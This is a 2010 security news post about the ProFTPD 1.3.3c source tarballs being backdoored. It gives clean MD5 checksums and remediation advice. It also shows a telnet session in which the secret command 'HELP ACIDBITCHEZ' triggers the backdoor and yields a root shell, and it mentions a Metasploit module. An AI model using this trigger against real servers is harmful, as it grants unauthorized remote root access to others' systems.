Skip to content

December 3, 2010

ProFTPD 1.3.3c Briefly Backdoored by Hackers

Servers of the widely popular FTP server, ProFTPD, were compromised (probably with 0day) on the 28th of November 2010. During the attack, some source code was modified to insert a backdoor. The source files affected were for ProFTPD version 1.3.3c., between the 28/11/2010 and 02/12/2010.

The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon.

If you installed or updated ProFTPD from one of the official mirrors during that time, it is recommended that you recompile from a known good version of the code. The source modification was spotted and rectified on 01/12/2010. MD5 sums for the valid source tarballs:

8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2

4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz

Hit the jump for details on how the backdoor is triggered. A Metasploit module is available to automate the exploit.

$ telnet 0 21
Trying 0.0.0.0…
Connected to 0.
Escape character is ‘^]’.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [127.0.0.1]
HELP
214-The following commands are recognized (* =>’s unimplemented):
CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV
EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD
XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*
PBSZ*   PROT*   TYPE    STRU    MODE    RETR    STOR    STOU
APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST
NLST    STAT    SITE    MLSD    MLST
214 Direct comments to someone@somewhere
HELP ANOOP
502 Unknown command ‘ANOOP’
HELP a
502 Unknown command ‘A’
HELP ACIDBITCHEZ
id ;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
The original backdoor source modifications can be seen in this patch.

Share your thoughts, post a comment.

(required)
(required)

Note: HTML is allowed. Your email address will never be published.

Subscribe to comments

css.php